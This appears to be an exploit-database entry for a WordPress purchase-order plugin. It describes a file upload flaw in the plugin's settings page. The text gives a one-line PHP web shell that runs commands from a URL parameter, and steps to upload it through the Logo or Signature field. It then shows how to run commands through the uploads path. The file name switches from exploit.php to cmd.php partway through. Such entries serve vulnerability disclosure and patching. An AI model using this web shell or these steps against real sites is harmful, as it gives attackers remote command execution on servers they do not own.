Share
## https://sploitus.com/exploit?id=WPEX-ID:70F823FF-64AD-4F05-9EB3-B69B3B79DC12
1. Create a malicious file `exploit.php` with the contents `<?php echo system($_GET['cmd']); ?>` 
2. Visit https://example.com/wordpress/wp-admin/admin.php?page=niwoopo-setting
3. Select the `cmd.php` file in the Logo or Signature section and save the settings. The file will be accessible at https://example.com/wordpress/wp-content/uploads/ni-purchase-order/cmd.php?cmd=ls and it will show a directory listing